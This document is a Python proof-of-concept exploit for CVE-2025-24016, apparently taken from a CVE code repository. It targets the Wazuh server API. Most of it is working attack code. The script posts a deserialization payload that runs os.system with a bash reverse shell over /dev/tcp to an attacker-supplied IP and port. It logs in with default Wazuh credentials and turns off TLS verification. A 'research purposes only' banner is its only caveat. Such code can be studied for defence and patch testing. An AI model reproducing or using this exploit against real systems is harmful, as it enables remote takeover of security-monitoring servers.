4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-24016.py PY
import argparse
import logging
import requests
from requests.auth import HTTPBasicAuth
import pyfiglet
import os
import time
import ipaddress
from packaging import version
import sys
import urllib3

logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)

def color_print(text, color=None):
    if color == 'error':
        return f"\033[1;31m{text}\033[0m"
    elif color == 'warning':
        return f"\033[1;33m{text}\033[0m"
    elif color == 'success':
        return f"\033[1;32m{text}\033[0m"
    elif color == 'info':
        return f"\033[1;36m{text}\033[0m"
    else:
        return text

def version_check():
    try:
        req_version = version.parse(requests.__version__)
        pyfiglet_version = version.parse(pyfiglet.__version__)
        logger.info(
            "Wazuh Current version:\n"
            f"Requests: {req_version}\n"
            f"PyFiglet: {pyfiglet_version}\n"
        )
    except Exception as e:
        logger.error("Pengecekan versi gagal karena %s", str(e))

def parse_args():
    parser = argparse.ArgumentParser(
        description="Wazuh RCE Exploit POC",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter
    )

    # Required
    required = parser.add_argument_group("Required")
    required.add_argument(
        "-u", "--url", required=True,
        help="URL target (ex: https://<worker-server>:55000/security/user/authenticate/run_as)"
    )
    required.add_argument(
        "-i", "--ip", required=True,
        help="LHOST for reverse shell connection"
    )
    required.add_argument(
        "-p", "--port", required=True, type=int,
        help="LPORT for reverse shell connection"
    )

    # Auth
    auth = parser.add_argument_group("Opsi Auth")
    auth.add_argument(
        "-user", "--username", default="wazuh-wui",
        help="Username for auth"
    )
    auth.add_argument(
        "-pass", "--password", default="MyS3cr37P450r.*-",
        help="Password for auth"
    )

    # Opsi tambahan
    optional = parser.add_argument_group("Opsi Tambahan")
    optional.add_argument(
        "-c", "--config-file", type=str,
        help="Path to configuration file"
    )
    optional.add_argument(
        "-n", "--no-color", action="store_true",
        help="Nonaktifkan output warna"
    )
    optional.add_argument(
        "--version", action="version",
        version="1.0",
        help="Show program version"
    )

    return parser.parse_args()
def check_ip(ip):
    try:
        ipaddress.ip_address(ip)
        return True
    except ValueError:
        logger.error("IP tidak valid: %s", ip)
        return False

def check_port(port):
    try:
        port_int = int(port)
        if 0 < port_int <= 65535:
            return True
        logger.error("Invalid Port: %s", port)
        return False
    except ValueError:
        logger.error("Port tidak merupakan angka: %s", port)
        return False

def check_url(url):
    if not url.startswith("http"):
        logger.error("Invalid URL, make sure the URL starts with http:// atau https://")
        return False
    return True

def main():
    args = parse_args()
    
    def local_color_print(text, color=None):
        if args.no_color:
            return text
        return color_print(text, color)
    
    if not check_ip(args.ip) or not check_port(args.port) or not check_url(args.url):
        logger.error("Invalid IP/Port/URL")
        sys.exit(1)
    
    version_check()
    
    ascii_motd = pyfiglet.figlet_format("Wazuh RCE")
    custom_header = (
        "\n" + 
        "---------------------------------------------------\n"
        "           Custom Wazuh RCE Header\n"
        "---------------------------------------------------\n"
    )
    
    print(ascii_motd)
    if args.config_file:
        print(custom_header)
    else:
        print("Wazuh Server RCE - CVE-2025-24016")
        print("Research & Testing Purposes Only!")
        print("Unauthorized use is strictly prohibited.")
        print("By: Jessie at Pelindo Cyber Security Team")
        print("Credits: Aiman, Cahyo, Ihsan & the Arch \n")
    
    # Payload
    payload = {
        "__unhandled_exc__": {
            "__class__": "os.system",
            "__args__": [
                f"bash -i >& /dev/tcp/{args.ip}/{args.port} 0>&1"
            ]
        }
    }
    
    headers = {
        "Content-Type": "application/json",
        "X-Header-Name": "Custom-Header"
    }
    
    # Auth 
    username = args.username
    password = args.password
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    try:
        response = requests.post(
            args.url,
            json=payload,
            headers=headers,
            auth=HTTPBasicAuth(username, password),
            verify=False,
            timeout=10
        )
        
        if response.status_code != 200:
            logger.error("Kode status respons: %d", response.status_code)
            if "Unauthorized" in str(response.text):
                logger.error("Failed Authentication")
            else:
                logger.error("Respons abnormal: %s", response.text)
            sys.exit(1)
            
        print(color_print("Sucess Authentication!", "success"))
        print("Respons:", color_print(response.text, "info"))
        
    except requests.exceptions.RequestException as e:
        error_type = type(e).__name__
        logger.error("%s: %s", error_type, str(e))
        sys.exit(1)
    
    # Opsi shell
    reverse_shell_options = {
        "command": "bash -i",
        "reverse_port": args.port,
        "timeout": 5,
        "retry_count": 3
    }
    
    logger.info("Established connection reverse shell to %s:%d", args.ip, int(args.port))
    time.sleep(reverse_shell_options["timeout"])
    
    try:
        s = os.system(reverse_shell_options["command"])
        if s != 0:
            logger.error("Reverse shell failed: %s", str(s))
    finally:
        if 's' in locals():
            del s
    
    print(color_print("Reverse shell success!", "success"))

if __name__ == "__main__":
    main()